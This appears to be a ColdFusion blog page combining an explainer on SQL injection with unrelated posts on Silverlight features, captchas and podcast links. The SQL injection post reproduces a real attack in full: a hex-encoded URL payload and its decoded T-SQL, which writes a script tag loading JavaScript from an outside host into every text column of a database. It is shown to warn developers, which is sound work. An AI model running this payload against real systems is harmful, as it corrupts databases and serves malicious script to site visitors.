What is a SQL Injection Attack?

SQL Injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Real World Example

SQL Injection attacks are commonly associated with a technique called Cross-Site Scripting (XSS). XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

In reality, what does this look like?

The following is a legitimate URL that may be navigated to by the user agent:

http://www.domain.com/folderName/fileName.cfm?variable1=0&variable2=4241

The following is a hacked URL:

http://www.domain.com/folderName/filename.cfm?
variable1=0&variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722
8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522
0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7
56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706
53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204
F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697
074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776
865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736
F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

The code appended to the URL is hexadecimal. This can be interpreted by the SQL engine. When the hexadecimal string is decoded by the SQL server, the SQL code generated looks similar to the following:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name from sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''
where '+@C+' not like ''%"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables of your database, the SQL injection attack will be able to interrogate those system tables and determine the structure of your database. The result, of the above example, is that the following code is injected into every string-based column in every table.

</title><script src="http://1.verynx.cn/w.js"></script><!--

To put it simply, this is very bad news!

ColdFusion-hacking is Popularised

ColdFusion-based sites are by no means immune to this international ‘information war’. The popularity of attacks on ColdFusion-based websites can be summarised by the fact that an article was featured on The Hacker Webzine recently, detailing how to implement a successful attack.

How to ‘Fix’ the Problem

As ColdFusion developers we not only need to be aware of the problem, we need to also know how to fix the problem and mitigate against an attack before it even happens.

In my next post, I will discuss how to fix a SQL injection attack.

Microsoft Silverlight is a proprietary runtime for browser-based Rich Internet Applications, providing a subset of the animation, vector graphics, and video playback capabilities of Windows Presentation Foundation. The runtime is available for Microsoft Windows and Mac OS X, with Linux support under development via the third-party Moonlight runtime.

Microsoft describes its advantages as follows:

Compelling Cross-Platform User Experiences

• Deliver media experiences and rich interactive applications for the Web that incorporate video, animation, interactivity, and stunning user interfaces.
• Seamless, fast installation for users, thanks to a small, on-demand, easy-to-install plug-in that is under 2 megabytes (MB) in size and works with all leading browsers.
• Consistent experiences between Windows-based and Macintosh computers without any additional installation requirements.
• Create richer, more compelling Web experiences that take greater advantage of the client for increased performance.
• Stunning vector-based graphics, media, text, animation, and overlays that enable seamless integration of graphics and effects into any existing Web application.
• Enhance existing standards/AJAX-based applications with richer graphics and media, and improve their performance and capabilities by using Silverlight.

Flexible Programming Model with Collaboration Tools

• Based on the Microsoft .NET Framework, Silverlight enables developers and designers to easily use existing skills and tools to deliver media experiences and rich interactive applications for the Web.
• Simple integration with existing Web technologies and assets means Silverlight works with any back-end Web environment or technology. No “rip and replace” required.
• Silverlight integrates with your existing infrastructure and applications, including Apache, PHP, as well as JavaScript and XHTML on the client.
• Choice of development languages including JavaScript, Ruby, Python, C#, Visual Basic .NET, and more.
• Role-specific tools for both designers and developers that take advantage of Web standards and the breadth of the Microsoft .NET connected software features.
• For designers: Microsoft Expression Studio for creating interactive user interfaces and media rich experiences, preparing media for encoding and distribution, and creating World Wide Web Consortium (W3C) standards-compliant sites using modern XHTML, XML, XSLT, CSS, and ASP.NET.
• For developers: Microsoft Visual Studio for developing client and server code with full Microsoft IntelliSense, powerful cross-platform debugging, rich language support, and more.
• Consistent presentation model by using XAML, the declarative presentation language used in Windows Vista–based applications. Controls, visual designs, media, and other elements can be presented with full design fidelity in both Silverlight and Windows-based applications.
• Extensible control model makes it easy to add rich content and behaviors while enabling efficient code-reuse and sharing.
• Dramatically improved performance for AJAX-enabled Web sites with the power, performance, and flexibility of Silverlight and .NET-connected software.

High Quality, Low Cost Media

• Unified media format that scales from high definition (HD) to mobile with Windows Media Video (WMV), the Microsoft implementation of the Society of Motion Picture and Television Engineers (SMPTE) VC-1 video standard, as well as support for Windows Media Audio (WMA) and MP3 audio.
• Add vector-based graphics and overlays to media with support for integration of graphics that scale to any size and broadcast-style overlays for tickers and closed captioning.
• Flexible ad-insertion solutions with video and animation, including the ability to deliver fluid, broadcast-style video or animated advertisements without loss of visual fidelity or motion quality.
• Lower-cost media streaming with Emmy Award winning Windows Media technologies that can lower the cost of streaming delivery by up to 46%, and enjoy the flexibility to work with your existing Windows Media streaming deployments. Even further cost reductions are possible with the upcoming Microsoft Internet Information Services (IIS) Media Pack for Microsoft Windows Server 2008.
• Broad ecosystem of media tools, servers, and solutions compatible with the Windows Media operating system.
• Microsoft PlayReady content-access technology that delivers a single solution for digital rights management support on both Windows-based and Macintosh computers for content providers (coming in Silverlight 1.1)
• Powerful encoding tools for live and on-demand publishing of media experiences with Microsoft Expression Encoder, including hardware-accelerated encoding of WMV and VC-1 at up to 15 times the performance of software alone when paired with a Tarari Encoder Accelerator board.

Connected to Data, Servers, and Services

• Mash-up and incorporate services and data from the Web by taking advantage of the Silverlight support for LINQ while accessing that data with common protocols like JSON, RSS, POX, and REST.
• Increase discoverability of rich interactive application (RIA) content that can be indexed and searched due to the text-based XAML format that describes interface and content in a Silverlight-based application.
• Rapidly scale applications with Silverlight Streaming by Windows Live to host and integrate software services and media content.

Streaming audio and video

• Silverlight Streaming by Windows Live offers a free streaming and application hosting solution for delivering high-quality, cross-platform, cross-browser, media-enabled rich interactive applications (RIAs). With the ability to author content in Microsoft Expression Encoder and other third-party editing environments, Web designers maintain complete control of the user experience.

Captchas are used to prevent bots from using various types of computing services. Applications include preventing bots from taking part in online polls, registering for free email accounts (which may then be used to send spam), and, more recently, preventing bot-generated spam by requiring that the (unrecognized) sender pass a captcha test before the email message is delivered.

Captcha Implementations

ColdFusion:

• The Alagad Captcha, a ColdFusion Component (CFC) written in 100% native ColdFusion.
• The Compound Theory Captcha CFC, A Free Coldfusion Captcha Component (CFC)

Bryan Kaiser & Michale Haynie interview Jake McKee, author of BlogFusion.

Links:

• BlogFusion
• Recipe of the week: Getting authenticated user name
• Technote on compiling C++ CFX tags on linux
• Joe Danziger’s new blog
• Unit Testing Part III by Robert Blackburn
• CFUnited
• cfSkypeCommunity
• Lego

Listen to the podcast.

Bryan Kaiser & Michael Haynie talk about a lot of news, the cfcompile utility and J2EE packaging and deployment.

Links:

• Blog entry on search bots causing very high memory usage from Michael Dinowitz
• Part 2 of the Flash Forms article from ASFusion.com
• Ben Forta wrote a UDF to access NIST’s time servers
• Unit testing DB code information from Robert Blackburn
• Ben Forta tells us that the BCS site is running on ColdFusion MX
• Technote – Apache may fail to start after installation of CFMX on RHEL 4
• Technote – MX 7.0.1 installation may report C++ incompatibility on RHEL 4
• Bob Flynn at IUMMUG mentions us in his newsletter
• Adobe bundles Macromedia software
• Simon Horwith interviews David Mendels of Adobe
• Adobe layoffs starting 12/15
• Adobe is blogging
• Sys-con.com article on cfcompile
• Technote – Using cfcompile in a J2EE configuration
• Greendoor – A GUI interface to cfcompile